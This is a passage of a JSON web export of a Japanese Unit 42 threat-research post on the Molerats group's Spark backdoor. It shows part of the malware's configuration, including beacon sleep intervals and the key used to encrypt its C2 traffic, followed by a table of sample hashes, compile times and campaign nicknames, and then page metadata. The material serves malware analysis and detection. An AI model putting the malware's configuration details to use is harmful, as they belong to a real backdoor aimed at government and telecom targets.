u306e\u6700\u5c0f\u30b9\u30ea\u30fc\u30d7\u9593\u9694<\/td>\n<\/tr>\n<tr>\n<td>119<\/td>\n<td>\u69cb\u6210<\/td>\n<td>\u5931\u6557\u3057\u305fC2\u30d3\u30fc\u30b3\u30f3\u9593\u306e\u6700\u5c0f\u30b9\u30ea\u30fc\u30d7\u9593\u9694<\/td>\n<\/tr>\n<tr>\n<td>JvFLb8pHNywoGdhtjsc5<\/td>\n<td>\u30ad\u30fc<\/td>\n<td>C2\u901a\u4fe1\u306e\u6697\u53f7\u5316\u306b\u4f7f\u7528\u3055\u308c\u308b<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><a id=\"post-105222-spark-nicknamescampaign-codes\"><\/a>Spark\u306e\u30cb\u30c3\u30af\u30cd\u30fc\u30e0\/\u30ad\u30e3\u30f3\u30da\u30fc\u30f3 \u30b3\u30fc\u30c9<\/h2>\n<table>\n<tbody>\n<tr>\n<td><strong>SHA256<\/strong><\/td>\n<td><strong>\u30b3\u30f3\u30d1\u30a4\u30eb\u6642\u523b<\/strong><\/td>\n<td><strong>\u30cb\u30c3\u30af\u30cd\u30fc\u30e0<\/strong><\/td>\n<\/tr>\n<tr>\n<td>0631ed0995e21ec..<\/td>\n<td>2017-03-27 2:46:06<\/td>\n<td>28-10<\/td>\n<\/tr>\n<tr>\n<td>966ad6452793b15..<\/td>\n<td>2017-05-24 6:15:04<\/td>\n<td>Nick name<\/td>\n<\/tr>\n<tr>\n<td>212aa6e3f236550..<\/td>\n<td>2017-05-24 6:15:04<\/td>\n<td>Nick name<\/td>\n<\/tr>\n<tr>\n<td>ab4e43b4e526d44..<\/td>\n<td>2017-05-24 6:15:04<\/td>\n<td>Nick name<\/td>\n<\/tr>\n<tr>\n<td>36166db096ddb50..<\/td>\n<td>2017-10-07 7:06:22<\/td>\n<td>bbb<\/td>\n<\/tr>\n<tr>\n<td>d010ef2b6664779..<\/td>\n<td>2017-10-07 7:06:23<\/td>\n<td>28-10<\/td>\n<\/tr>\n<tr>\n<td>194c236a3eed81f..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>sss<\/td>\n<\/tr>\n<tr>\n<td>fc420a49b1e9e22..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>sss<\/td>\n<\/tr>\n<tr>\n<td>bc9353adc58b983..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>sss<\/td>\n<\/tr>\n<tr>\n<td>9d49020debdc6ab..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>Nick name<\/td>\n<\/tr>\n<tr>\n<td>3a32c81ec609a54..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>3007<\/td>\n<\/tr>\n<tr>\n<td>c3e23a42dc49b03..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>50852<\/td>\n<\/tr>\n<tr>\n<td>8e5bf597948ea6a..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>O<\/td>\n<\/tr>\n<tr>\n<td>151303254451271..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>Nick name<\/td>\n<\/tr>\n<tr>\n<td>83750372d4e8c04..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>0204<\/td>\n<\/tr>\n<tr>\n<td>58376e763ef0ca9..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>R<\/td>\n<\/tr>\n<tr>\n<td>1c43f8f68f7b8e4..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>ood<\/td>\n<\/tr>\n<tr>\n<td>ab2335ba3abe97a..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>Nick name<\/td>\n<\/tr>\n<tr>\n<td>a4c6aea61953d51..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>Nick name<\/td>\n<\/tr>\n<tr>\n<td>329e9e98f08f3d6..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>FUD<\/td>\n<\/tr>\n<tr>\n<td>78696cf4370817c..<\/td>\n<td>2017-10-22 7:03:45<\/td>\n<td>Ben<\/td>\n<\/tr>\n<tr>\n<td>ec0d30d2fdd301b..<\/td>\n<td>2017-10-28 10:55:21<\/td>\n<td>28-10<\/td>\n<\/tr>\n<tr>\n<td>9511940ed52775a..<\/td>\n<td>2017-12-02 11:16:24<\/td>\n<td>&lt;\u7a7a\u767d&gt;<\/td>\n<\/tr>\n<tr>\n<td>5139a334d5629c5..<\/td>\n<td>2019-09-16 10:00:45<\/td>\n<td>bnvcs<\/td>\n<\/tr>\n<tr>\n<td>89acce7cdd354a0..<\/td>\n<td>2019-09-16 10:00:45<\/td>\n<td>Docx<\/td>\n<\/tr>\n<tr>\n<td>b654dd768912e09..<\/td>\n<td>2019-09-16 10:00:45<\/td>\n<td>2909<\/td>\n<\/tr>\n<tr>\n<td>daa72ba2b9525d7..<\/td>\n<td>2019-09-16 10:00:45<\/td>\n<td>PalCamp<\/td>\n<\/tr>\n<tr>\n<td>69df8e4bdc3fd69..<\/td>\n<td>2019-09-16 10:00:45<\/td>\n<td>NewsMac<\/td>\n<\/tr>\n<tr>\n<td>cf32479ed30ae95..<\/td>\n<td>2019-12-30 9:45:44<\/td>\n<td>1401<\/td>\n<\/tr>\n<tr>\n<td>64ea1f1e0352f3d..<\/td>\n<td>2020-01-12 10:57:50<\/td>\n<td>FS1-2020<\/td>\n<\/tr>\n<tr>\n<td>6e60f5c65299ee7..<\/td>\n<td>2020-01-12 10:57:50<\/td>\n<td>1801<\/td>\n<\/tr>\n<tr>\n<td>b08b8fddb9dd940..<\/td>\n<td>2020-01-12 10:57:50<\/td>\n<td>FS1-2020<\/td>\n<\/tr>\n<tr>\n<td>04fa6aaea5e3a26..<\/td>\n<td>2020-01-12 10:57:50<\/td>\n<td>up<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6982\u8981 2019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u306b\u304b\u3051\u3066\u3001Unit 42\u306f\u3001Molerats(\u5225\u540dGaza Hackers Team\u304a\u3088\u3073Gaza Cybergang)\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u306b\u95a2\u9023\u3059\u308b\u3068\u307f\u3089\u308c\u308b\u3001\u30d5\u30a3\u30c3<\/p>\n","protected":false},"author":46,"featured_media":105223,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[4321,1974,4428],"tags":[6393,6395,5691,6397,6398,4587],"product_categories":[4441,4340,4444],"coauthors":[635,935,934],"class_list":["post-105222","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research","category-malware-ja","category-threat-research-ja","tag-gaza-hacking-team-ja","tag-jhonerat-ja","tag-macros-ja","tag-molerats-ja","tag-spark","tag-spear-phishing-ja","product_categories-advanced-dns-security-ja","product_categories-advanced-wildfire","product_categories-advanced-wildfire-ja"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Molerats\u306b\u3088\u308b\u653f\u5e9c\u6a5f\u95a2\u304a\u3088\u3073\u901a\u4fe1\u4e8b\u696d\u8005\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u914d\u4fe1<\/title>\n<meta name=\"description\" content=\"2019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u3001Molerats\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u3068\u306e\u95a2\u9023\u304c\u7591\u308f\u308c\u308b\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u304c\u8907\u6570\u56de\u89b3\u6e2c\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f6\u30ab\u56fd\u306b\u304a\u3088\u3076\u653f\u5e9c\u30fb\u901a\u4fe1\u4e8b\u696d\u8005\u30fb\u4fdd\u967a\u30fb\u5c0f\u58f2\u696d\u306e8\u3064\u306e\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Molerats\u306b\u3088\u308b\u653f\u5e9c\u6a5f\u95a2\u304a\u3088\u3073\u901a\u4fe1\u4e8b\u696d\u8005\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u914d\u4fe1\" \/>\n<meta property=\"og:description\" content=\"2019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u3001Molerats\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u3068\u306e\u95a2\u9023\u304c\u7591\u308f\u308c\u308b\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u304c\u8907\u6570\u56de\u89b3\u6e2c\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f6\u30ab\u56fd\u306b\u304a\u3088\u3076\u653f\u5e9c\u30fb\u901a\u4fe1\u4e8b\u696d\u8005\u30fb\u4fdd\u967a\u30fb\u5c0f\u58f2\u696d\u306e8\u3064\u306e\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2020-03-10T07:25:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/03\/word-image-25.png\" \/>\n\t<meta property=\"og:image:width\" content=\"900\" \/>\n\t<meta property=\"og:image:height\" content=\"450\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Alex Hinchliffe, Robert Falcone, Bryan Lee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Molerats\u306b\u3088\u308b\u653f\u5e9c\u6a5f\u95a2\u304a\u3088\u3073\u901a\u4fe1\u4e8b\u696d\u8005\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u914d\u4fe1","description":"2019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u3001Molerats\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u3068\u306e\u95a2\u9023\u304c\u7591\u308f\u308c\u308b\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u304c\u8907\u6570\u56de\u89b3\u6e2c\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f6\u30ab\u56fd\u306b\u304a\u3088\u3076\u653f\u5e9c\u30fb\u901a\u4fe1\u4e8b\u696d\u8005\u30fb\u4fdd\u967a\u30fb\u5c0f\u58f2\u696d\u306e8\u3064\u306e\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/","og_locale":"ja_JP","og_type":"article","og_title":"Molerats\u306b\u3088\u308b\u653f\u5e9c\u6a5f\u95a2\u304a\u3088\u3073\u901a\u4fe1\u4e8b\u696d\u8005\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u914d\u4fe1","og_description":"2019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u3001Molerats\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u3068\u306e\u95a2\u9023\u304c\u7591\u308f\u308c\u308b\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u304c\u8907\u6570\u56de\u89b3\u6e2c\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f6\u30ab\u56fd\u306b\u304a\u3088\u3076\u653f\u5e9c\u30fb\u901a\u4fe1\u4e8b\u696d\u8005\u30fb\u4fdd\u967a\u30fb\u5c0f\u58f2\u696d\u306e8\u3064\u306e\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u3002","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/","og_site_name":"Unit 42","article_published_time":"2020-03-10T07:25:36+00:00","og_image":[{"width":900,"height":450,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/03\/word-image-25.png","type":"image\/png"}],"author":"Alex Hinchliffe, Robert Falcone, Bryan Lee","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/"},"author":{"name":"Alex Hinchliffe","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7d51f04a2afcca497cde7076d89d516f"},"headline":"Molerats\u306b\u3088\u308b\u653f\u5e9c\u6a5f\u95a2\u304a\u3088\u3073\u901a\u4fe1\u4e8b\u696d\u8005\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u914d\u4fe1","datePublished":"2020-03-10T07:25:36+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/"},"wordCount":3734,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/03\/word-image-25.png","keywords":["Gaza Hacking Team","JhoneRAT","Macros","MoleRats","Spark","Spear Phishing"],"articleSection":["Threat Research","\u30de\u30eb\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/","name":"Molerats\u306b\u3088\u308b\u653f\u5e9c\u6a5f\u95a2\u304a\u3088\u3073\u901a\u4fe1\u4e8b\u696d\u8005\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u914d\u4fe1","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/03\/word-image-25.png","datePublished":"2020-03-10T07:25:36+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7d51f04a2afcca497cde7076d89d516f"},"description":"2019\u5e7410\u6708\u304b\u30892019\u5e7412\u6708\u521d\u3081\u3001Molerats\u3068\u3057\u3066\u77e5\u3089\u308c\u308b\u8105\u5a01\u30b0\u30eb\u30fc\u30d7\u3068\u306e\u95a2\u9023\u304c\u7591\u308f\u308c\u308b\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u304c\u8907\u6570\u56de\u89b3\u6e2c\u3055\u308c\u307e\u3057\u305f\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f6\u30ab\u56fd\u306b\u304a\u3088\u3076\u653f\u5e9c\u30fb\u901a\u4fe1\u4e8b\u696d\u8005\u30fb\u4fdd\u967a\u30fb\u5c0f\u58f2\u696d\u306e8\u3064\u306e\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3057\u3066\u3044\u307e\u3057\u305f\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/03\/word-image-25.png","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2020\/03\/word-image-25.png","width":900,"height":450},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/molerats-delivers-spark-backdoor\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"Molerats\u306b\u3088\u308b\u653f\u5e9c\u6a5f\u95a2\u304a\u3088\u3073\u901a\u4fe1\u4e8b\u696d\u8005\u3078\u306eSpark\u30d0\u30c3\u30af\u30c9\u30a2\u306e\u914d\u4fe1"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/7d51f04a2afcca497cde7076d89d516f","name":"Alex Hinchliffe","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Alex Hinchliffe"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/author\/alex-hinchliffe\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/105222","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/46"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=105222"}],"version-history":[{"count":3,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/105222\/revisions"}],"predecessor-version":[{"id":105254,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/105222\/revisions\/105254"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/105223"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=105222"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=105222"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=105222"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=105222"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=105222"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}